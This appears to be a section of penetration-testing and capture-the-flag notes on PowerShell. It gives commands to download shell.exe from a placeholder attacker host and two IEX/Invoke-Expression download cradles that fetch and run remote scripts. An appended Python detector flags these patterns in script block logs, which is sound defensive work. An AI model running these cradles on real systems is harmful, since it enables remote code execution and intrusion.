This section collects Microsoft PowerShell-based techniques and syntax used during penetration tests and capture-the-flag exercises.
Check the processor architecture of the host:

PS > $ENV:PROCESSOR_ARCHITECTURE
AMD64

List a directory including hidden and system files (ls is an alias for Get-ChildItem):

PS > ls -Force
PS > Invoke-WebRequest -Uri "http://(ATTACKER IP ADDRESS)/shell.exe" -OutFile 'C:\path\to\writeable\dir\shell.exe'
The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line would be returned (echoed) unchanged.
PS C:\Target-System> IEX(New-Object Net.WebClient).downloadString('http://(ATTACKER IP ADDRESS)/(PowerShell Script).ps1')
OR
PS C:\Target-System> Invoke-Expression(New-Object Net.WebClient).downloadString('http://(ATTACKER IP ADDRESS)/(PowerShell Script).ps1')
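As an added, defender-side example (not part of the original notes): the two cradles above, and the Invoke-WebRequest -OutFile drop earlier, leave distinctive text in PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, event ID 4104, ScriptBlockText). The Python below runs over constructed sample events with placeholder hosts and tags the IEX/Invoke-Expression plus Net.WebClient.DownloadString combination and file drops to disk.

```python
import re

# Constructed sample events in the shape of PowerShell script block logging
# (Microsoft-Windows-PowerShell/Operational, event ID 4104). Placeholder hosts only.
SAMPLE_EVENTS = [
    {"EventID": 4104, "ScriptBlockText":
     "IEX(New-Object Net.WebClient).downloadString('http://(ATTACKER IP ADDRESS)/(PowerShell Script).ps1')"},
    {"EventID": 4104, "ScriptBlockText":
     "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')"},
    {"EventID": 4104, "ScriptBlockText":
     "Invoke-WebRequest -Uri 'http://203.0.113.5/shell.exe' -OutF 'C:\\Users\\Public\\shell.exe'"},
    {"EventID": 4104, "ScriptBlockText": "Get-ChildItem -Force C:\\Windows\\Temp"},
    {"EventID": 4104, "ScriptBlockText": "$ENV:PROCESSOR_ARCHITECTURE"},
    {"EventID": 4104, "ScriptBlockText":
     "Invoke-WebRequest -Uri 'https://www.powershellgallery.com/api/v2' -UseBasicParsing"},
]

# IEX is the built-in alias for Invoke-Expression; PowerShell is case-insensitive.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# .NET WebClient fetching a string: the in-memory half of the cradle.
FETCH_RE = re.compile(r"net\.webclient\b.*\.downloadstring\s*\(", re.I)
# Invoke-WebRequest writing to disk; PowerShell accepts any unambiguous
# parameter prefix, so "-OutF" matches as well as "-OutFile".
DROP_RE = re.compile(r"\binvoke-webrequest\b.*\s-outf\w*", re.I)

def classify_script_block(text: str) -> list[str]:
    """Return detection tags for one ScriptBlockText value (empty list = no finding)."""
    tags = []
    fetch = FETCH_RE.search(text)
    if fetch and EXEC_RE.search(text):
        tags.append("download-cradle")   # fetch and execute in memory, nothing hits disk
    elif fetch:
        tags.append("remote-fetch")      # fetched, but execution is not in this block
    if DROP_RE.search(text):
        tags.append("drop-to-disk")
    return tags

def scan_events(events) -> list[tuple[str, list[str]]]:
    """Run the classifier over 4104 events and keep only those with findings."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        tags = classify_script_block(ev["ScriptBlockText"])
        if tags:
            hits.append((ev["ScriptBlockText"], tags))
    return hits

if __name__ == "__main__":
    print(scan_events(SAMPLE_EVENTS))
```

The regexes catch the plain forms shown on this page; obfuscated cradles (string concatenation, backtick insertion, encoded commands) need the decoded 4104 text or additional patterns.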